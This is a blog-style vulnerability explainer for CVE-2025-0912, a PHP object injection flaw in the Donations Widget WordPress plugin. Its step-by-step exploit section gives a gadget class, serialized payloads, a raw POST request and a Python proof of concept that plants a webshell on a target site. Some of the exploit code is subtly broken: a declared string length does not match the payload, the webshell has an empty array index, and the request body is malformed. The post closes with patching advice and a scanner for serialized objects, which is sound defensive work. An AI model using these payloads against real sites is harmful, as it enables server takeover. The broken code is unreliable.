WordPress is all about making things easier, from blogging to taking donations. But sometimes, plugins built to help can be a big risk. One such plugin is “Donations Widget.” In this long read, we will break down CVE-2025-0912: a dangerous vulnerability that lets hackers run their own code on your site, just by sending it a malicious donation.

What is CVE-2025-0912?

CVE-2025-0912 is a vulnerability in the Donations Widget WordPress plugin. It affects all versions up to and including 3.19.4. This flaw is a classic PHP Object Injection that comes from the way the plugin handles user-submitted information in the donation form.

Specifically, the unsafe handling happens through the card_address parameter: the plugin passes this value straight to unserialize() without validating it, so whatever serialized data an attacker submits is deserialized on the server.

The worst part: You don’t even have to be logged in to exploit this.

Why is PHP Object Injection Dangerous?

PHP object injection is all about tricking unserialize() into building any PHP object you want. Attackers can…

- Inject objects with properties set to whatever they like.
- Abuse “POP chains” (Property Oriented Programming), which are pre-existing classes that trigger dangerous methods when their objects are built or destroyed.
- If the plugin or anything it loads has a dangerous POP chain, attackers can achieve Remote Code Execution (RCE), letting them fully compromise your server.

This is what happens inside the plugin (simplified)

```php
// Vulnerable code inside Donations Widget plugin (simplified)
$address = $_POST['card_address'];    // attacker-controlled, never validated
$addressObj = unserialize($address);  // any loaded class can be instantiated from this input
// ... uses $addressObj somewhere
```

An attacker can send anything to $_POST['card_address']. Even a malicious object that, when unserialized, runs code.

Step-by-Step Exploitation (with Code Snippet)

1. Find a POP Chain

Suppose the site has a common plugin or class with a “POP chain” (for example, a class whose destructor runs eval() or writes to a file).

Let’s pretend there is a class like this (in reality, there are many in different plugins)

```php
// Hypothetical gadget class standing in for a real POP chain
class EvilClass {
    public $cmd;
    function __destruct() {
        eval($this->cmd);
    }
}
```

2. Build a Malicious Payload

We want unserialize() to build an EvilClass object… with $cmd set to anything we want.

```php
$object = new EvilClass();
$object->cmd = 'system("id");'; // This will run the "id" command on the server

$payload = serialize($object);
echo $payload;
```

For the above, it would be

```
O:9:"EvilClass":1:{s:3:"cmd";s:11:"system("id");";}
```

3. Send a POST request to the vulnerable endpoint

```http
POST /wp-content/plugins/donations-widget/donation-form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

card_address=O:9:"EvilClass":1:{s:3:"cmd";s:11:"system("id");";}
other_field1=foo&other_field2=bar
```

4. Result: Remote Code Execution

If the plugin (or another present plugin) has the POP chain, the server ends up running the attacker's code. In this case, it runs the id command and can do much worse (like dropping webshells, stealing database credentials, etc).

Here’s the cleanest possible PoC in Python

```python
import requests

url = 'https://target.site/wp-content/plugins/donations-widget/donation-form.php'
payload = r'O:9:"EvilClass":1:{s:3:"cmd";s:19:"file_put_contents(\'shell.php\',\'<?php system($_GET[]); ?>\');";}'

data = {
    'card_address': payload,
    # ... add any other required post fields here
}

requests.post(url, data=data)
```

How to Protect Your Site

1. Update Immediately

If a patched version is released, update to at least 3.19.5 (or the latest).

2. Apply WAF rules

Use a web application firewall to block suspicious payloads, especially POST parameters containing serialized PHP objects.
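As an added example (not code from the post, the plugin, or any WAF product), here is a small Python checker for that rule: instead of a regex, it walks PHP's serialize() format itself, so it reports an object even when it is nested inside an array, and flags object-shaped values that would not parse cleanly. The card_address field name comes from the advisory; Example_Class and the sample body are constructed.

```python
from urllib.parse import unquote_plus
class PhpSerialWalker:
    """Walks PHP serialize() output without building values; records every O: class name."""
    def __init__(self, data):
        self.s, self.i, self.classes = data, 0, []  # lengths in the format are byte counts
    def walk(self):
        self._value()
        if self.i != len(self.s): raise ValueError("trailing data")
        return self.classes
    def _expect(self, ch):
        if self.s[self.i:self.i + 1] != ch: raise ValueError(f"expected {ch!r} at {self.i}")
        self.i += 1
    def _until(self, ch):  # read up to ch and consume it
        j = self.s.index(ch, self.i)
        tok, self.i = self.s[self.i:j], j + 1
        return tok
    def _quoted(self, n):  # exactly n bytes between double quotes
        self._expect('"'); tok = self.s[self.i:self.i + n]; self.i += n; self._expect('"')
        return tok
    def _value(self):
        tag = self.s[self.i:self.i + 1]; self.i += 1
        if tag == "N":
            self._expect(";")
        elif tag in ("i", "b", "d", "r", "R"):  # scalars and back-references
            self._expect(":"); self._until(";")
        elif tag == "s":
            self._expect(":"); self._quoted(int(self._until(":"))); self._expect(";")
        elif tag in ("a", "O"):
            self._expect(":")
            if tag == "O":  # the class name comes before the member count
                self.classes.append(self._quoted(int(self._until(":")))); self._expect(":")
            n = int(self._until(":")); self._expect("{")
            for _ in range(n): self._value(); self._value()  # key, then value
            self._expect("}")
        else:
            raise ValueError(f"unknown tag {tag!r} at {self.i - 1}")

def scan_post_body(body):
    """Map each serialized-looking field to the classes it would build ([] = plain array, ['<malformed>'] = does not parse)."""
    findings = {}
    for pair in body.split("&"):
        field, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if value[:2] in ("O:", "a:"):  # cheap pre-filter before walking the value
            try:
                findings[unquote_plus(field)] = PhpSerialWalker(value).walk()
            except ValueError:
                findings[unquote_plus(field)] = ["<malformed>"]
    return findings
SAMPLE_BODY = 'card_address=a:1:{i:0;O:13:"Example_Class":1:{s:4:"note";s:5:"hello";}}&amount=10'  # constructed
```

A WAF or log-review job can block or alert on any field whose list is non-empty; a plain serialized array ([]) is worth logging too, since a donation form has no reason to send one.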

3. Check for unauthorized files

Look for suspicious files in your web root (for webshells and backdoors).

4. Audit PHP code

Don’t use unserialize() on untrusted data. Consider switching to json_decode() for forms; where unserialize() cannot be avoided, pass ['allowed_classes' => false] as its second argument so that no object can be instantiated from the input.

References

- Wordfence Advisory on Donations Widget
- PHP Object Injection explained
- OWASP: Object Injection
- Official Plugin Page
- PHP POP Chains database

Final Words

CVE-2025-0912 is a critical, super dangerous bug. Any site running an old Donations Widget version is at high risk. Spread the word, patch quickly, and encourage your team and friends to revisit old plugins!


*This post is exclusive content written for you by an independent security enthusiast. Always credit original researchers and responsibly disclose vulnerabilities.*

Timeline

Published on: 03/04/2025 04:15:11 UTC
Last modified on: 03/05/2025 16:39:15 UTC